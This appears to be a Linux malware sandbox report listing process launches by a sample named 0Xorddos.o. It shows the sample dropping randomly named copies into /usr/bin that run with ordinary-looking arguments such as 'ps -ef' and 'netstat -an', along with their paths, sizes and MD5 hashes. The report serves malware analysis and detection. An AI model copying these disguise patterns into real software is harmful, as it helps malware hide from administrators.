                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:05
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:05
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:05
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/qfvvwlqqkq
                                                                                                                                                Arguments:/usr/bin/qfvvwlqqkq sh 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:0e70bb0814ee7b2c7ad5cf64f29d5619

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:05
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/qfvvwlqqkq
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:0e70bb0814ee7b2c7ad5cf64f29d5619

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:05
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:05
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:05
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/qfvvwlqqkq
                                                                                                                                                Arguments:/usr/bin/qfvvwlqqkq su 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:0e70bb0814ee7b2c7ad5cf64f29d5619

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:05
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/qfvvwlqqkq
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:0e70bb0814ee7b2c7ad5cf64f29d5619

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:05
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:05
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:05
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/qfvvwlqqkq
                                                                                                                                                Arguments:/usr/bin/qfvvwlqqkq who 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:0e70bb0814ee7b2c7ad5cf64f29d5619

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:06
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/qfvvwlqqkq
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:0e70bb0814ee7b2c7ad5cf64f29d5619

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:11
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:11
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:11
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/yfmoszlrcg
                                                                                                                                                Arguments:/usr/bin/yfmoszlrcg bash 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:60863a11322160a778609c30ecc68f82

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:11
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/yfmoszlrcg
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:60863a11322160a778609c30ecc68f82

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:11
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:11
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:11
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/yfmoszlrcg
                                                                                                                                                Arguments:/usr/bin/yfmoszlrcg id 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:60863a11322160a778609c30ecc68f82

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:11
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/yfmoszlrcg
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:60863a11322160a778609c30ecc68f82

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:11
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:11
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:11
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/yfmoszlrcg
                                                                                                                                                Arguments:/usr/bin/yfmoszlrcg "netstat -an" 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:60863a11322160a778609c30ecc68f82

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:11
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/yfmoszlrcg
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:60863a11322160a778609c30ecc68f82

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:11
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:11
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:11
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/yfmoszlrcg
                                                                                                                                                Arguments:/usr/bin/yfmoszlrcg ifconfig 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:60863a11322160a778609c30ecc68f82

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:11
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/yfmoszlrcg
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:60863a11322160a778609c30ecc68f82

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:11
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:11
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:11
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/yfmoszlrcg
                                                                                                                                                Arguments:/usr/bin/yfmoszlrcg su 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:60863a11322160a778609c30ecc68f82

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:11
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/yfmoszlrcg
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:60863a11322160a778609c30ecc68f82

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:16
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:16
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:16
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/ohcvvmubid
                                                                                                                                                Arguments:/usr/bin/ohcvvmubid id 5222
                                                                                                                                                File size:625922 bytes
                                                                                                                                                MD5 hash:c7ce206c868addcd2e0bc6024f6f630d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:16
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/ohcvvmubid
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625922 bytes
                                                                                                                                                MD5 hash:c7ce206c868addcd2e0bc6024f6f630d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:16
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:16
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:16
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/ohcvvmubid
                                                                                                                                                Arguments:/usr/bin/ohcvvmubid top 5222
                                                                                                                                                File size:625922 bytes
                                                                                                                                                MD5 hash:c7ce206c868addcd2e0bc6024f6f630d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:16
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/ohcvvmubid
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625922 bytes
                                                                                                                                                MD5 hash:c7ce206c868addcd2e0bc6024f6f630d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:16
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:16
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:16
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/ohcvvmubid
                                                                                                                                                Arguments:/usr/bin/ohcvvmubid who 5222
                                                                                                                                                File size:625922 bytes
                                                                                                                                                MD5 hash:c7ce206c868addcd2e0bc6024f6f630d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:16
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/ohcvvmubid
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625922 bytes
                                                                                                                                                MD5 hash:c7ce206c868addcd2e0bc6024f6f630d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:16
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:16
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:16
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/ohcvvmubid
                                                                                                                                                Arguments:/usr/bin/ohcvvmubid top 5222
                                                                                                                                                File size:625922 bytes
                                                                                                                                                MD5 hash:c7ce206c868addcd2e0bc6024f6f630d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:16
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/ohcvvmubid
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625922 bytes
                                                                                                                                                MD5 hash:c7ce206c868addcd2e0bc6024f6f630d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:16
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:16
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:16
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/ohcvvmubid
                                                                                                                                                Arguments:/usr/bin/ohcvvmubid "ps -ef" 5222
                                                                                                                                                File size:625922 bytes
                                                                                                                                                MD5 hash:c7ce206c868addcd2e0bc6024f6f630d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:16
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/ohcvvmubid
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625922 bytes
                                                                                                                                                MD5 hash:c7ce206c868addcd2e0bc6024f6f630d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:21
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:21
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:21
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/kswkpwzxrd
                                                                                                                                                Arguments:/usr/bin/kswkpwzxrd "route -n" 5222
                                                                                                                                                File size:625922 bytes
                                                                                                                                                MD5 hash:0fbca893d09e52c16eab105ba5aa9665

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:21
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/kswkpwzxrd
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625922 bytes
                                                                                                                                                MD5 hash:0fbca893d09e52c16eab105ba5aa9665

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:21
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:21
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:21
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/kswkpwzxrd
                                                                                                                                                Arguments:/usr/bin/kswkpwzxrd "cd /etc" 5222
                                                                                                                                                File size:625922 bytes
                                                                                                                                                MD5 hash:0fbca893d09e52c16eab105ba5aa9665

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:21
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/kswkpwzxrd
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625922 bytes
                                                                                                                                                MD5 hash:0fbca893d09e52c16eab105ba5aa9665

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:21
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:21
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:21
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/kswkpwzxrd
                                                                                                                                                Arguments:/usr/bin/kswkpwzxrd "cd /etc" 5222
                                                                                                                                                File size:625922 bytes
                                                                                                                                                MD5 hash:0fbca893d09e52c16eab105ba5aa9665

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:21
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/kswkpwzxrd
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625922 bytes
                                                                                                                                                MD5 hash:0fbca893d09e52c16eab105ba5aa9665

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:21
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:21
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:21
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/kswkpwzxrd
                                                                                                                                                Arguments:/usr/bin/kswkpwzxrd "ls -la" 5222
                                                                                                                                                File size:625922 bytes
                                                                                                                                                MD5 hash:0fbca893d09e52c16eab105ba5aa9665

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:21
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/kswkpwzxrd
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625922 bytes
                                                                                                                                                MD5 hash:0fbca893d09e52c16eab105ba5aa9665

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:21
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:21
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:21
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/kswkpwzxrd
                                                                                                                                                Arguments:/usr/bin/kswkpwzxrd gnome-terminal 5222
                                                                                                                                                File size:625922 bytes
                                                                                                                                                MD5 hash:0fbca893d09e52c16eab105ba5aa9665

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:21
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/kswkpwzxrd
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625922 bytes
                                                                                                                                                MD5 hash:0fbca893d09e52c16eab105ba5aa9665

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:23
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/lib/systemd/systemd
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:1620224 bytes
                                                                                                                                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:23
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                                                                                Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                                                                                File size:22760 bytes
                                                                                                                                                MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                                                                                                                Chronological Activities